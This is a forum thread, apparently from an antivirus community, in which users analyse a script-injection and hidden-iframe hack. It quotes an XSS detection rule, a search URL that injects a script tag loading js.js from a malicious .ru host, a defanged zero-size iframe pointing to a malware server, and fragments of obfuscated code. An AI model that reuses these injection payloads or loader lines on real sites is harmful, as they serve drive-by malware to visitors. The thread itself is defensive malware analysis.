A 3CSCRIPT hack...

Hi malware fighters,

Look here how it was performed : http://www.webhostingtalk.com/showthread.php?t=626444
I give this in at Google:
=== Triggered rule ===
alert(url_content:“%3CSCRIPT”; nocase; msg:“ tags GET request cross site scripting attempt”; url_re:“/%3Cscript.*%3E/i”; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://www.google.com/search?client=flock&channel=fds&q=<script+src%3Dhttp%3A%2F%2Fexport.webservicessl.ru%2Fjs.js>&ie=utf-8&oe=utf-8&aq=t

What is this js.js malware? See: http://www.google.com/safebrowsing/diagnostic?site=http%3A//export.webservicessl.ru/js.js
See: http://jsunpack.jeek.org/dec/go?report=f657a77d0501a9cb52516346fd69dfcc8da15ccb
You get this here:

^iframe src=htxp://letter.kafeira.com:8080/index.php?pid=6 width=0 height=0 frameborder=0^^/iframe>")}catch(e){}}= "error code to get an SQL" pol 

Expired site now used for malicious purposes:
kafeiracom - wXw.kafeiracom

Malware folks, more and more malware…

polonus

VirusTotal - scriptA.txt - 1/41
http://www.virustotal.com/analisis/a18b1856f9fcd8820b88e16e7b0f5dbbbff4bc8025a815f6c50152201ee7ea37-1278518424

VirusTotal - scriptB.txt - 1/41
http://www.virustotal.com/analisis/85a64ae5a63874d17bd3f8f54dc9eddc0402148ee4ee58b1aa5db0d94e13e144-1278518442

VirusTotal - scriptC.txt - 4/41
http://www.virustotal.com/analisis/44d70cd4203d850263a1b1bf8be6ca95efc56b7d8bf3739eb1422975cba08480-1278518659

Hi Pondus,

But there is a lot of descriptions here about this kind of exploit:
http://blog.unmaskparasites.com/2009/04/29/another-type-of-iframe-hack-php-exploit/
http://www.techjaws.com/php-script-injection-exploit-in-wordpress-271/

Also posted by me: http://forum.avast.com/index.php?topic=45133.15

polonus

Hi malware fighters.

Here is an example of the obfuscated code of JS:Redirector-H [Trj],
see attached gif

polonus

Hi malware fighters,

Tested this htxp://letter.kafeira.com:8080/index.php?

Found: htxp://letter.kafeira.com:8080/.replace(/%5BM%5C%5EKNB%5D/g, (output debug string)
htxp://letter.kafeira.com:8080/u/nvdve/fviWn/eWdt
htxp://letter.kafeira.com:8080/.replace(/%5BtvW/0%5D/g,
htxp://letter.kafeira.com:8080/.replace(/%5B%5C%3Ck%5C?p]]/g,
htxp://letter.kafeira.com:8080/.replace(/%5B%5C)TQql%5D/g, (streamhiking)
htxp://letter.kafeira.com:8080/.replace(/%5BAB%5C?X]]/g,

polonus